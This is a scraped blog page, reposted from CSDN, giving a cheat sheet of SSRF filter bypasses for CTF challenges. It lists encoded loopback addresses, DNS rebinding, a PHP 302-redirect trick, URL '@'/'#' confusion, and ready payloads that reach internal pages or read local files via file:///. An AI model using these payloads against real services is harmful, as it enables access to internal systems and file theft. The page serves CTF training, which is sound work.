Common SSRF bypasses for CTF - Code World

Common SSRF bypasses for CTF

Enterprise 2023-10-03 13:56:57 views: null

1. Bypass localhost and 127.0.0.1

When the program restricts us from using localhost and 127.0.0.1, we can use hexadecimal conversion to bypass

http://0x7F.0.0.1	//16进制
http://0177.0.0.1	//8进制
http://2130706433	//10进制整数格式
http://0x7F000001	16进制整数格式
http://127.1	//省略模式
http://127.127.127.127	//用CIDR绕过localhost
http://0	//特殊地址0
http://0.0.0.0
http://[::1]	//ipv6回环地址

IP hexadecimal conversion: https://tool.520101.com/wangluo/jinzhizhuanhuan
hexadecimal conversion: https://www.sojson.com/hexconvert.html

2.CTFSHOW example questions:

2.1 Directly exploit the SSRF vulnerability to read the flag locally:

Payload：url=http://127.0.0.1/ctf/ssrf/flag.php
Payload：url=file:///C:/phpstudy/phptutorial/www/ctf/ssrf/1.txt

Insert image description here
2.2 Bypass localhost and 127.0.0.1

Payload：url=http://127.127.127.127/ctf/ssrf/flag.php

Insert image description here
2.3 Bypass localhost and 0 and 1
(1) DNS rebinding:

http://test.com ——> 127.0.0.1

The public domain name resolves to 127.0.0.1:

https://blog.csdn.net/lovelyelfpop/article/details/107306577

(2) 302 jump:

header("Location:http://127.0.0.1/flag.php");

Payload：url=http://safe.taobao.com/ctf/ssrf/flag.php

Insert image description here
2.4 Bypassing restricted URLs
The wonderful uses of # and @ in URLs:

例：https://www.baidu.com#www.qq.com
https://[email protected]
http://[email protected]  //实则访问www.qq.com
http://www.baidu.com#www.qq.com  //实则访问www.baidu.com

Payload：url=http://[email protected]/ctf/ssrf/flag.php#show

Insert image description here

Guess you like

Origin blog.csdn.net/qq_42383069/article/details/130344397

Common SSRF bypasses for CTF

Common bypasses for CTF command execution

WAF bypasses common ideas

CTF SSRF (server request forgery)

[De1CTF 2019]SSRF Me

CTF basic common sense

Brush title record: [De1CTF 2019] SSRF Me

Code audit | [De1CTF 2019] SSRF Me

WEB BUUCTF [De1CTF 2019] SSRF Me

BUUCTF [De1CTF 2019] SSRF Me

CTF common solution in a compressed file

CTF Misc common tool integration

Summary of common MISC tools in CTF

Common simple encryption methods in CTF

CTF common cryptographic encryption and decryption summary

Brush title records De1CTF ssrf_me Three Solutions

[Red] SSRF Day16-CTF vulnerabilities curl access to local resources

[N1CTF 2018]easy_harder_php soap_ssrf

CTF SSRF (сервер запрос подлог)

Общие обходы SSRF для CTF

Общие обходы SSRF для CTF

Общие обходы SSRF для CTF

Общие обходы SSRF для CTF

XSS bypasses restrictions

Common tools necessary for CTF competitions (download method attached)

[CTF knowledge base] Common security device default password list

Compilation of common CTF knowledge points (organized during personal review)

XSS attack bypasses htmlspecialchars function

XSS attack bypasses htmlspecialchars function

git commit bypasses eslint check

Recommended

Ranking

[Algorithm] greedy _ program scheduling issues

Spring 控制反转（IOC）

Data structure-6.6 figure

Indicates that the class or member method has abstract properties

Huawei v5 server installed Linux operating system

Postgresql source code analysis - creating ordinary tables

Chapter 10 Evaluation Classification Results

Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages

Java Exercise 17.1

Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.

Daily

More

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)